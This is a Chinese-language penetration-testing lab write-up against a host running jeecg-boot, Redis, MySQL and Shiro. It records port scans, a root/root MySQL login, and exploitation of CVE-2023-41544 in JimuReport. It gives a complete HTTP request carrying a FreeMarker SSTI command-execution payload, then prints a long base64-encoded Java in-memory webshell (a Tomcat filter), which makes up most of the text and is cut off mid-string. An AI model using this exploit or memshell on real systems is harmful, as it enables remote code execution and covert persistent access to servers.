wuxian打靶记录—月挑战

入口机器10.10.0.3

使用多种扫描工具对其进行端口探测,指纹识别等来进行交叉验证

TscanPlus扫描:扫描结果如下:

ID Host Port Protocol Target Banner Code Title
1 10.10.0.3 22 SSH 10.10.0.3:22 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 0
2 10.10.0.3 3306 MYSQL 10.10.0.3:3306 MySQL 8.0.19 0
3 10.10.0.3 6379 REDIS 10.10.0.3:6379 Redis key-value store 5.0.14 0
4 10.10.0.3 18080 HTTP http://10.10.0.3:18080 APACHE-Shiro 200 DocToolkit
5 10.10.0.3 18088 HTTP http://10.10.0.3:18088 Apache-Tomcat 404 HTTP Status 404 – Not Found

fscan扫描:结果如下

发现了弱口令:再使用tscan爆破模块进行交叉验证

确实存在mysql弱口令数据库暴露了出来,将初步收集到的信息进行保存

对http网站进行目录探测操作:

这里,可以利用多种爆破工具,在此出于方便,我直接利用tscanplus进行扫描

探测到如下一些信息:

http://10.10.0.3:18088/

可以发现一些关于:jeecg-boot的一些信息,在这里打个?后面再对其进行深度分析和挖掘。

http://10.10.0.3:18080/

探测到如上目录:

可以发现:DocToolkit依旧打个?后续对其进行深入研究和挖掘

mysql弱口令root/root直接利用navicat工具连接:

依旧发现了jeecg-boot的行踪与上面相呼应。

10.10.0.3-积木报表 SSTI:

http://10.10.0.3:18088/jeecg-boot/

尝试查询相关历史漏洞进行利用:

直接利用这个One-fox里的jeecg-boot框架相关的工具对其进行漏洞探测

直接利用内置的工具进行rce:

这个是java的ssti:具体cve漏洞为:CVE-2023-41544手动复现如下

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 10.10.0.3:18088
Content-Length: 165
Cache-Control: max-age=0
Origin: http://10.10.0.3:18088
Content-Type: application/json
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.0.3:18088/jeecg-boot/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

尝试ssti打入内存马:

直接利用工具java-memshell-generator生成base64编码生成后的内存马:

1
yv66vgAAADEBsgEAK29yZy9hcGFjaGUvY29tbW9ucy9sYW5nL2wvQ29uZmlndXJhdGlvblV0aWwHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAAi8qCAAIAQAMZ2V0Q2xhc3NOYW1lAQAvY29tLmZhc3RlcnhtbC5qYWNrc29uLlNlcnZsZXRSZXF1ZXN0UGp4dGRGaWx0ZXIIAAsBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADwEAEGphdmEvbGFuZy9TdHJpbmcHABEBCkxINHNJQUFBQUFBQUFBS1ZYQ1hzVDF4VTl6NUk5c2l4Q0VNRllRSUtURkxBczI4S0FDWllKaWVVNHdjUTJGQ1dtanRObExJMHNHWGtrTkNQSG9rdmFkRW02cDAyM2ROOUpkOUlHR1FjQ2RBc05UWnR1N3I5SnY1NDNJOG1TTEJ2NjlmdXNOL1BldSsvY2U4OWQzdmpHZjE2OUFxQVgveFlJUnROendiaHFtRnAyWVM0Vm5GV2pwNDIwSG94bzJmbVVacDdVenVRMHd6d3h1MkRHSGs2bUtLUkFDR3laVmVmVllFclZaNEpES2RVd1J0TnFURzQ1Qk82UVd3dEJ3ejRmTEIxcUZCQXpQTmd4RmZhUDFwd2VFSEFPcFdPYXdNYlJwSzZONSthbXRleGo2blNLSzk3UmRGUk5UYWpacEp3WEY1MW1JbWtJOUk3K2o3WlRrWmdXYUpnS0M3VEV0RGlWV1FZSWJLVmRJeU9yTGZQZ2RteHl3d212UU5QaHBKNDBqd2c0T3Z3VEh0eUJMWEtqVldCYlIrMDVtNDhCL3dRVlJvbSt4cjRFYVpNZzJ3VmNzYlJ0cE1DVWpiZENZclZEQTJ2dEdwbTBibWkxMnpicVVFSk42cFpCbTFkc0dWNklhaGt6bWRZVjdCUlFETTB3T0JGb3I0RkltR1ltZUpSRHhKWWdqNDcwOUt5TWx3V1dNNU9wNEppYTRmcVc0dEZvTnA4eDA4R2haQ1poODY2VjltcFVjKzgybzhvL2didlc5NTk2aldxZkJYYmVoQlFHUEw1Q2hNRDJkVmdpRmRtU0tYdldwcUxHSmxlMmJFeHQvRllmS2x1MTY1YmdGZXdUMkgxcm9Bb09DR3lJbUN3R2hxUllNZTZFSmpOdVhKMnphbW9sRGhFem05Um5tSW4zNFZBekd0QXYwRHlqbVVjdGNlcnNXQzNycjNkOEFJZGJzQi8zazJkYjFZU2F5bWtlUEdERFBpaHdlKzBwQlN4RFZ6U3RteVNkTmJpOXFvd1NhallpbmRlajJvRC9DUThld3JBYlEzaVl2dEMrU0NsVjcrbnczeXhaUFRpS0VXbmNNWUZOSy9sNlZEVVNKRWpCcUJ0amFIV2hoN1JWcGJPQ0UwejBUSTVwY0tqU3R1UFRzMXEwV0laVksvN1ZTeDZjUktRRjc4UmpMdXgxNFc1V1FzNkZkN0dIWmRnSFBIakM1bWVLU2IrK0d3cmVUYlpvakVVc0U3Tk9aT3BZeEViMVhyeXZCZStCU2w4R2h5TXVSSXM5b0taSUZSQzFoZHlPNklhcGtuWUIvNXJScnkxd0QyYVFjQ09PSkV1eFNzRElhRkZXWXpTcm1ZOXErUWhuQ2s3VEV5b0s1MDJOY1hkMitLZkNIc3hCbHdGTzI4MjRqbUtyNTU1eEl3VW1wbFAyWWlrNllrc2FXalNYVFpyNUlKVllvaVp5MHA3NXFzU3pXVkd3WUJ0UWJQNmJPK28xL3JONHZ4dDVmSURkcG1aVHdZZll0RXJuN1Y0dTRGdU5VbTd6SDhaSDNIZ2F6N2daYXZiNkhldTFOd1VmdDJ2d1pMRUd0NVdBaytsZ09CZVBhMWt0WnU4UitWazgxNEpQNEpNQ3JmVmxGSHphNmsxcVRONnR2Sjg3NnRidlovRTVOejZEejlPeFdEcXNHdHJCQXc5cFVldFNicTJYQlRKaVg4QVhwVU12c0YvS3kwdFhVN3drNVFVdk43K01yMGorditxQkFwY1VlNUhacFd0UHJXUlh0U1hsZXZrR3ZpbTUraGF4U0lpYU11UlhRNTNNWmsvNERyNHJRL1E5a3I5bU4xZndBNEVILzc4YlZlYlRuZmhSQzM2SUg3UC9sTzh1bzNTYmt2V1I0eFczNlU5V2xYTVJza0xtWndLTjBaUjY5aXk3VXAwdklpVm0wWit0YnRkRjU1bi84MnEyanhWdG1KUm9OWEo2ejF6U2lQYUVCeVBEcGNobFhmZ05jZUxwWXR2ZmRaTmVYa3I4Q3lqSUFDd0tlR3diN0lSeVljbk95ekhOVEtSalpWS3I4S1pXNFZWcXlHcnhGTTBQMmdoVWRRbVhwYXJYQk5yV2tsSndsWm1RMU9mVHArbERmNTFNbUxyRlJ2eGIvTTZOYS9pOWdvM0ZwdEFqTzMyUG5lMHV2RzVmTFdYeS9rUzlOZ0V1M0dCYnE4MmhZcEtsOVhoeXh2cXk4c1FyVmxqbDY4bGJBV2J3MG5uYTBxdjJ4cUw5dmRIK3ZmZnQzOWNYUGVqQzMyakw0enpZUFRpajZhWUwvNkQ4TVQyZVQ2UlVGLzZGdTFsUFR0QStPRGp5RHVIWHZKQlh1UFY4d0hyeVExMldIc2RtenU2bmZBT2Z6WjBCUitES0lqYWY1NlFCYm81TkZBRmJhd3ZIVmxzSUhtd0FyTGZic0pIN1FuN3VGcUdHS1NOUGJPMWM1TS83OXd0NHN0UDd6d3NJZFhxWEwyRHc1VEt3MndMYlN0QTJDOXhqSHl1Q1M4aTJJdVFKU2tyWnRzN0FJbmJjSEhNN1VYWlVHTnhXTnJnTlBteXpETDRUZDNHUDZPSXlYWlJhbGdQWHNEL2s3THFHdmxDano5bjVDa0pMT05LQTEvRlN4WXd2Z3dVODhpSmVrT0pMZUZRZzFIUUpZNU9MR0E4cFBzVjdQTENFeHgwNHhkY0pYMlA1L1pTdnFmamU1SjBreUpOTG1IYkFHN3VJMlpETDUycThoSlMxWEVER0cxdUVVY0JUbDlBdzJWbkFCd3Y0NkNJKzVuTjFFdmxUQWdVOFg4Q1hDdmhhQVY4djROcytwWUR2bnpxSGx1NUExeExPT1hBT0cwSk5wY25MZE5XRDY3aUJkaWFEcE9nWXZCeDMwdWwyN3R5TElONkJFSGJ4YnQyTmNleGh1blN3TVhmQ1FJQ1hYQmVlUnpjdW93ZFhLWG1kbjBrMytJL2htOWpITkR0Z1VSd25hZ2pQTU9udUllWVFHKzY5UkZSNE5reXlkekhGM3VSdk41R2JKTW5sVUN4VGo5OEsrVEsxQmF4QUxWTmZOKzFzd2x2VUdHUlNldkFHOWxKakl3NXlmeE9jYitPcWd2MEsrcFN3Z3ZabXZHU2xhQU4raXA4VGpIZU9IVlc4emRWR1B2UGVWeTdpNGxpWDkxWG5hM2g2MHVFZGloUndwWXZFY1o2ZmRBUTQvY00xL0xIOGQzN01lNTBueHJ1OWJ6aDRnc0tDenp5bFFrNmZrK0h3L3JrU3llZGNDOGZ5VGRwZVluNmJ4Y0FoanYxY0RaSERBYzRPWTVUbEo1azh3cDBtTXZFTC9KSk9ITUtnOWViZ2ZqZCtoZk5rWXg4ZVlVVDNXRnpseTB6bThXdEtDNHNoVnVzWjhtTFJJbHRBTzM4bUkyQ1QwbWNWQ25OK3BXTHM4ZzVYVklzb0F3djhCWC9sV0FLVERMOVZMdlNBSlZFSGJMaWluTXRnL3dVU015Y1JWUkFBQUE9PQgAEwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAFQAWCgASABcBAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAaAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAGZmlsdGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHY29udGV4dAEACGNvbnRleHRzAQAQTGphdmEvdXRpbC9MaXN0OwEABHRoaXMBAC1Mb3JnL2FwYWNoZS9jb21tb25zL2xhbmcvbC9Db25maWd1cmF0aW9uVXRpbDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAkTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAOamF2YS91dGlsL0xpc3QHACcBABJqYXZhL3V0aWwvSXRlcmF0b3IHACkBAA1TdGFja01hcFRhYmxlDAAVABkKAAQALAEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsMAC4ALwoAAgAwAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAAyADMLACgANAEAB2hhc05leHQBAAMoKVoMADYANwsAKgA4AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAA6ADsLACoAPAEACWdldEZpbHRlcgEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAA+AD8KAAIAQAEACWFkZEZpbHRlcgEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgwAQgBDCgACAEQBAARrZXkxAQAIY2hpbGRyZW4BABNMamF2YS91dGlsL0hhc2hNYXA7AQADa2V5AQALY2hpbGRyZW5NYXABAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAFABABBqYXZhL2xhbmcvVGhyZWFkBwBSAQARamF2YS91dGlsL0hhc2hNYXAHAFQBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwBWCgBXACwBAApnZXRUaHJlYWRzCABZAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAFsAXAoAAgBdAQAHZ2V0TmFtZQwAXwAGCgBTAGABABxDb250YWluZXJCYWNrZ3JvdW5kUHJvY2Vzc29yCABiAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAGQAZQoAEgBmAQAGdGFyZ2V0CABoAQAFZ2V0RlYMAGoAXAoAAgBrAQAGdGhpcyQwCABtCABHAQAGa2V5U2V0AQARKClMamF2YS91dGlsL1NldDsMAHAAcQoAVQByAQANamF2YS91dGlsL1NldAcAdAsAdQA0AQADZ2V0DAB3AD8KAFUAeAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAegB7CgAEAHwBAA9qYXZhL2xhbmcvQ2xhc3MHAH4KAH8AYAEAD1N0YW5kYXJkQ29udGV4dAgAgQEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgwAgwCECwAoAIUBABVUb21jYXRFbWJlZGRlZENvbnRleHQIAIcBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DACJAIoKAFMAiwEACHRvU3RyaW5nDACNAAYKAH8AjgEAGVBhcmFsbGVsV2ViYXBwQ2xhc3NMb2FkZXIIAJABAB9Ub21jYXRFbWJlZGRlZFdlYmFwcENsYXNzTG9hZGVyCACSAQAJcmVzb3VyY2VzCACUCAAgAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAJcBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYMABUAmQoAmACaAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24HAJwBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwCeAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAoAEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQATamF2YS9sYW5nL1Rocm93YWJsZQcApAEACWNsYXp6Qnl0ZQEAAltCAQALZGVmaW5lQ2xhc3MBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwCuAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DACwALEKAFMAsgEADmdldENsYXNzTG9hZGVyDAC0AIoKAH8AtQwACgAGCgACALcBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAC5ALoKAK8AuwwADQAGCgACAL0BAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDAC/AMAKAAIAwQEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDADDAMQKAAIAxQgAqAcApwEAEWphdmEvbGFuZy9JbnRlZ2VyBwDJAQAEVFlQRQwAywCrCQDKAMwBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAM4AzwoAfwDQAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwDSAQANc2V0QWNjZXNzaWJsZQEABChaKVYMANQA1QoA0wDWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMANgA2QoAygDaAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DADcAN0KANMA3gEAC25ld0luc3RhbmNlDADgADsKAH8A4QEADWdldEZpbHRlck5hbWUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEADGxhc3REb3RJbmRleAEAAUkBAAljbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAEuCADpAQALbGFzdEluZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkMAOsA7AoAEgDtAQAJc3Vic3RyaW5nAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7DADvAPAKABIA8QEACWZpbHRlckRlZgEACWZpbHRlck1hcAEAAmUyAQAMY29uc3RydWN0b3JzAQAgW0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJDb25maWcBAA1maWx0ZXJDb25maWdzAQAPTGphdmEvdXRpbC9NYXA7AQAOY2F0YWxpbmFMb2FkZXIBAA9maWx0ZXJDbGFzc05hbWUBAApmaWx0ZXJOYW1lAQAjW0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjwqPjsHAPcBABFnZXRDYXRhbGluYUxvYWRlcgwBAACKCgACAQEMAOMA5AoAAgEDAQANZmluZEZpbHRlckRlZggBBQEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAWwEHCgACAQgBAC9vcmcuYXBhY2hlLnRvbWNhdC51dGlsLmRlc2NyaXB0b3Iud2ViLkZpbHRlckRlZggBCgEAB2Zvck5hbWUMAQwAugoAfwENAQAvb3JnLmFwYWNoZS50b21jYXQudXRpbC5kZXNjcmlwdG9yLndlYi5GaWx0ZXJNYXAIAQ8BACRvcmcuYXBhY2hlLmNhdGFsaW5hLmRlcGxveS5GaWx0ZXJEZWYIAREBACRvcmcuYXBhY2hlLmNhdGFsaW5hLmRlcGxveS5GaWx0ZXJNYXAIARMBAD0oTGphdmEvbGFuZy9TdHJpbmc7WkxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KUxqYXZhL2xhbmcvQ2xhc3M7DAEMARUKAH8BFgEADXNldEZpbHRlck5hbWUIARgBAA5zZXRGaWx0ZXJDbGFzcwgBGgEADGFkZEZpbHRlckRlZggBHAEADXNldERpc3BhdGNoZXIIAR4BAAdSRVFVRVNUCAEgAQANYWRkVVJMUGF0dGVybggBIgwABQAGCgACASQBADBvcmcuYXBhY2hlLmNhdGFsaW5hLmNvcmUuQXBwbGljYXRpb25GaWx0ZXJDb25maWcIASYBABdnZXREZWNsYXJlZENvbnN0cnVjdG9ycwEAIigpW0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsMASgBKQoAfwEqAQANc2V0VVJMUGF0dGVybggBLAEAEmFkZEZpbHRlck1hcEJlZm9yZQgBLgEADGFkZEZpbHRlck1hcAgBMAEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yBwEyCgEzANYBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAOABNQoBMwE2CAD5AQANamF2YS91dGlsL01hcAcBOQEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAE7ATwLAToBPQEAD3ByaW50U3RhY2tUcmFjZQwBPwAZCgAbAUABACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgcBQgEAIGphdmEvbGFuZy9JbnN0YW50aWF0aW9uRXhjZXB0aW9uBwFEAQABaQEADGRlY29kZXJDbGFzcwEAB2RlY29kZXIBAAdpZ25vcmVkAQAJYmFzZTY0U3RyAQAUTGphdmEvbGFuZy9DbGFzczwqPjsBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyCAFMAQAMZGVjb2RlQnVmZmVyCAFOAQAJZ2V0TWV0aG9kDAFQAM8KAH8BUQEAEGphdmEudXRpbC5CYXNlNjQIAVMBAApnZXREZWNvZGVyCAFVAQAGZGVjb2RlCAFXAQAOY29tcHJlc3NlZERhdGEBAANvdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACaW4BAB5MamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbTsBAAZ1bmd6aXABAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAGYnVmZmVyAQABbgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwFiAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcBZAEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwFmCgFjACwBAAUoW0IpVgwAFQFpCgFlAWoBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABUBbAoBZwFtAQAEcmVhZAEABShbQilJDAFvAXAKAWcBcQEABXdyaXRlAQAHKFtCSUkpVgwBcwF0CgFjAXUBAAt0b0J5dGVBcnJheQEABCgpW0IMAXcBeAoBYwF5AQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEZ2V0RgEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBfwGACgACAYEBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBgwoBhADWCgGEAHgBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAYcBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAYoBiwoAfwGMAQANZ2V0U3VwZXJjbGFzcwwBjgB7CgB/AY8KAYgAFwEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEACnBhcmFtQ2xhenoBABJbTGphdmEvbGFuZy9DbGFzczsBAAVwYXJhbQEAE1tMamF2YS9s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